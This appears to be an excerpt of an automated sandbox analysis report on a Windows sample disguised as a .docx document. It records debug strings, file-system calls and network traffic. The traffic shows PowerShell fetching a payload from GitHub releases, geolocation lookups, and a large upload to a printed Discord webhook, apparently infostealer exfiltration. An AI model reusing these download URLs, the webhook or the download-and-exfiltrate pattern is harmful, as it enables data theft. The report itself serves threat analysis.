Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2019937163.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008197505.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2010798981.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009942650.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: chost.exe, chost.exe, 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: chost.exe, 00000010.00000003.2015141052.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: chost.exe, 00000010.00000003.2019463574.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.16.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: chost.exe, 00000011.00000002.2384746452.00007FFDFF141000.00000040.00000001.01000000.00000019.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: chost.exe, 00000010.00000003.2015300574.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008611249.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: chost.exe, 00000010.00000003.2018892218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: chost.exe, 00000011.00000002.2379354062.00007FFDF6EC2000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: chost.exe, 00000010.00000003.2001935182.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2386288251.00007FFE0E143000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011643843.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: chost.exe, 00000010.00000003.2010798981.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008100864.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2017577218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2007994678.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: chost.exe, 00000010.00000003.2007080475.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009401971.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: chost.exe, 00000011.00000002.2384507849.00007FFDFB8E1000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: chost.exe, 00000010.00000003.2007196096.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: chost.exe, 00000010.00000003.2011030564.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2018181506.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011824022.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011643843.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2006803490.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: chost.exe, 00000011.00000002.2385791832.00007FFE0121E000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2007080475.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: chost.exe, 00000011.00000002.2384267020.00007FFDF7BE1000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.pdb source: powershell.exe, 0000004F.00000002.2251813408.0000014E00CB0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: chost.exe, 00000011.00000002.2385015786.00007FFDFF6A1000.00000040.00000001.01000000.00000017.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2018892218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011824022.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: chost.exe, 00000011.00000002.2378252189.00007FFDEAF4F000.00000040.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: chost.exe, 00000011.00000002.2379354062.00007FFDF6F5A000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: chost.exe, 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009632951.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: chost.exe, 00000010.00000003.2007318540.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: chost.exe, 00000010.00000003.2006803490.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011730854.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: chost.exe, 00000010.00000003.2017577218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: chost.exe, chost.exe, 00000011.00000002.2379354062.00007FFDF6F5A000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008197505.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2015300574.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: chost.exe, 00000010.00000003.2019937163.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.pdbhP5 source: powershell.exe, 0000004F.00000002.2251813408.0000014E00CB0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011458839.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: chost.exe, 00000010.00000003.2010088702.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: chost.exe, 00000010.00000003.2007431242.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: chost.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: chost.exe, 00000011.00000002.2385510396.00007FFE0029C000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008304877.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: chost.exe, 00000011.00000002.2386439853.00007FFE11EA1000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008775784.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2018415439.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: chost.exe, 00000010.00000003.2009525097.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.16.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: chost.exe, 00000011.00000002.2385277924.00007FFDFF6C1000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011730854.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF6943692F0 FindFirstFileExW,FindClose,	16_2_00007FF6943692F0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF6943683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	16_2_00007FF6943683B0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF6943818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	16_2_00007FF6943818E4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF6943692F0 FindFirstFileExW,FindClose,	17_2_00007FF6943692F0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF6943818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	17_2_00007FF6943818E4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF6943683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	17_2_00007FF6943683B0

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	File opened: C:\Users\user\AppData\Local\Temp\4713.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	File opened: C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	File opened: C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	File opened: C:\Users\user\	Jump to behavior

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: global traffic	HTTP traffic detected: GET /newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/891167481/a56faf23-5067-4d66-b5a8-66cbc7b403dc?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183617Z&X-Amz-Expires=300&X-Amz-Signature=05af9abbcf2fda6397f14df92d9672e21ed149afb39203f4783b988b05380976&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dscan000373.jpg&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /newpro008/poh21/releases/download/hu23/chost.exe/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/896881501/caceb723-d9ae-4751-b7b0-81b8adcb2786?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183627Z&X-Amz-Expires=300&X-Amz-Signature=33a7a3fb3cd6638665d2dc4c91930814d62f43cc4ea961c8a1ca69c047be325d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchost.exe&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/891167481/a56faf23-5067-4d66-b5a8-66cbc7b403dc?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183617Z&X-Amz-Expires=300&X-Amz-Signature=05af9abbcf2fda6397f14df92d9672e21ed149afb39203f4783b988b05380976&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dscan000373.jpg&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /newpro008/poh21/releases/download/hu23/chost.exe/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/896881501/caceb723-d9ae-4751-b7b0-81b8adcb2786?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183627Z&X-Amz-Expires=300&X-Amz-Signature=33a7a3fb3cd6638665d2dc4c91930814d62f43cc4ea961c8a1ca69c047be325d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchost.exe&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: blank-7uov3.in
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 446171User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=5645850d9eec13ce7bafd163781539ae

Source: chost.exe, 00000010.00000003.2022003495.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: chost.exe, 00000010.00000003.2004224246.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003687671.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024109201.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022483004.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002768779.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025325913.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021422817.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000002.2390966378.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021380155.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022179110.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025346442.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002560501.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002967954.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022156527.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022179110.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021422817.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: chost.exe, 00000010.00000003.2004224246.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003687671.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022483004.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002768779.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024065098.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021380155.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022179110.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002560501.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002967954.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022156527.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003506905.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022003495.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024276759.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025346442.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003307439.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003942488.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2005749574.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.16.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: chost.exe, 00000010.00000003.2025346442.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampin
Source: chost.exe, 00000010.00000003.2004224246.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003687671.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002768779.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025325913.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024065098.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021380155.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002560501.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002967954.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022179110.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021422817.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003506905.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022003495.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003307439.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003942488.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2005749574.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.16.dr, libssl-3.dll.16.dr, _socket.pyd.16.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
